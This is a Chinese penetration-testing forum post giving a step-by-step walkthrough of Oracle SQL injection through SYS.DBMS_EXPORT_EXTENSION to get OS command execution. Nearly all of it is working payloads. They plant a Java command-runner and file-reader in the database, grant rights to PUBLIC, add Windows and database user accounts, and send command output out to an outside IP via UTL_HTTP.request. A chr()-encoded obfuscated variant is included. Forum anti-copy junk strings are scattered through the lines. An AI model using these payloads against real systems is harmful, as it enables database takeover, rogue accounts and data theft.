中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]
作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 - p8 m$ A! F- P/ {4 m8 `( C3 I
' h; l4 v7 ^) A5 h" n
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
+ @' |% a' J; d7 W% q- q5 f" Z的形式即可。(用" 'a'|| "是为了让语句返回true值) 0 b; z* ^0 p+ @" F, E3 Q. Q
语句有点长,可能要用post提交。
# T3 I  e! A9 v4 T) j以下是各个步骤:
8 J, J5 ]- B! G1 i1.创建包 ! H9 n1 ^/ \/ q1 j" b
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:5 ]% a6 k+ b1 U) T+ e+ j
/xxx.jsp?id=1 and '1'<>'a'||( 9 U9 e  p8 ]% F( Z7 _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& D6 D7 M4 {6 q) X. p3 f
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(! U  ?$ {# N7 C/ U
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}- U+ Z* U6 I/ D# y
}'''';END;'';END;--','SYS',0,'1',0) from dual
# w3 J# W9 z5 ]# U$ G1 Z)
3 q( }- @* n0 m/ w$ X% G( T------------------------ ' [8 S3 b* T8 u$ Q
如果url有长度限制,可以把readFile()函数块去掉,即:
9 m. I) p* \" E% G: Z( c/xxx.jsp?id=1 and '1'<>'a'||( , }  f3 B+ l+ X7 |! ?# N  e; w2 i6 f% C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' S7 _3 |7 v  e5 Jcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
0 Z/ E8 _6 ?: n1 w. Bnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
2 Q& l% C8 j. g6 ?3 K6 i5 J: I}'''';END;'';END;--','SYS',0,'1',0) from dual 1 B2 S; ~& @# V7 y" J, d8 \. d
)
4 R# p( y% `6 p# \7 b. S同时把后面步骤 提到的 对readFile()的处理语句去掉。
2 P, a; @5 q/ w------------------------------
7 N5 n7 H4 i: i2 c6 U/ c3 }2.赋Java权限
- P7 G# T8 |. U' z* nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; ^0 u* h& `( K6 ^2 e# @# Z
3.创建函数 & X3 P0 ^4 y& V- M) q% d
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. k8 \+ w( x7 p/ h5 Ycreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual# b. K/ U8 x" w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* V: G3 f' B& G3 |* \1 ]; f# f9 ~. N
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual3 ~% X2 u/ L. \5 g& G+ u# A, t2 a
4.赋public执行函数的权限 3 S) ~( C1 k( B; z( b; i
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual# e* o& L% \( T2 P
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
6 l# ^/ P* I% U5.测试上面的几步是否成功
9 i( R1 y2 ~. [# l- \5 J6 mand '1'<>'11'||(
2 S2 _0 }" P4 r9 n* @select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
! m) X/ @# J3 ^. F)
0 I8 j" S' V( P- a7 r$ C; P' w- fand '1'<>( & _2 q$ y2 f. c& J0 b8 N  n1 L
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' . ?( c/ Z9 k' a/ \4 S  p8 d+ @
)
+ W; i: O6 C( r6 C9 k2 g6.执行命令:
7 @, f3 \% [# p& m8 W6 J2 o/xxx.jsp?id=1 and '1'<>(
. H; p. [+ B0 u' eselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
# V& j5 I* o4 {, {& y4 Y
1 b5 T$ A/ V, ~+ {) & M/ r6 B- K" y% R' ]# X( L" p
/xxx.jsp?id=1 and '1'<>(
9 h) ]9 t* L2 G7 c0 D5 h' aselect  sys.LinxReadFile('c:/boot.ini') from dual# ^+ _0 L$ k( Y7 \

7 {% Q9 N' h4 X& d0 L), ?5 e1 S' B: [! x3 u; ^0 ~/ t
  3 [% K+ k- Z! m
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 0 o! O3 g( D" ?4 Z3 m
如果要查看运行结果可以用 union : , q& A. O7 E/ N' h) t+ Q: p
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual1 a# ]6 m0 ^1 X- J; g2 p
或者UTL_HTTP.request(: 4 ^& a& w2 j7 B, j5 x
/xxx.jsp?id=1 and '1'<>( 4 a% M$ J! x8 S  w
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
8 A/ T9 }5 n* o2 e* D) ; A' o4 p# b" M; B! P& S
/xxx.jsp?id=1 and '1'<>( 6 d2 y3 h/ `/ J, I9 O) U
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual* _% k# n" J0 z
) $ ]% |2 e! G$ R
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
5 P; r+ G/ @# I; Z, Z--------------------   J: O) k9 J+ j7 y8 t
6.内部变化
& o1 U7 L/ i2 r; k: |通过以下命令可以查看all_objects表达改变:
+ I! Q& p) x; Cselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%': b; o  o, I6 G& A* g
7.删除我们创建的函数
! L+ e( B7 A; n& K" Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; T8 G! k5 d1 Udrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 4 O# p5 K* z, f8 Y2 I, h
====================================================
) r( S3 o0 y) F0 ~. y全文结束。谨以此文赠与我的朋友。 ( k( M: U) |9 V" s  h) [
linx 6 ?  g0 _. I" J
124829445
( G$ z. b8 c5 o2008.1.12
6 V. _5 x- u  j: f) ?8 q5 {  }linyujian@bjfu.edu.cn
" S9 V; N6 P- Y( Z- V/ L  J======================================================================
6 W4 i2 Z3 d4 U8 R& a/ v测试漏洞的另一方法: & y/ r0 T4 g4 b  m
创建oracle帐号:
/ m4 m7 _* r2 d! u2 V; {3 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! k0 X5 u6 f+ f5 q/ V
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
& y: ^5 M. `/ S+ R即: $ E) X, C6 X4 V0 D) Q! m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),* @' R* X6 i3 s) Z3 A
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
8 S3 i% Z: E0 J, K& _. ]确定漏洞存在: ' J# C8 Z+ \& A# r( l) _  a/ y0 t
1<>(
" w: I3 N$ G/ Z; Wselect user_id from all_users where username='LINXSQL'
( Q2 }* ~9 {6 D)
4 Z' L  ~& I- E3 P& ^: p7 z) K给linxsql连接权限:
$ z* R! {2 f) H. ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* C% T4 }' j/ e8 B; v7 f5 K5 KGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual . C, y1 U: h6 J6 j
删除帐号:
0 s+ i9 p) g$ yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" z3 [) ~. H) J8 u5 }! a; @% v0 edrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual : s1 e6 K! k* ]5 z, @& J7 V
======================
& E9 B5 s; r: K/ ?# ~以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:) i' F/ G9 U% \5 W! M3 J- O) d
1.jsp?id=1 and '1'<>(
1 z. m+ Z9 o0 o2 v- ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  w# R$ b# W3 M& Z/ Icreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
( A6 N. A% v/ Q) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
% L3 e/ s2 x; L4 U7 X# O9 ^3 @ )
' K& j* C3 m9 K3 d( M' L2 g3 J5 @2 x2 p. D
: o# g( a# c5 K$ p; d, n
1 Q* p: V, @+ O, a




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2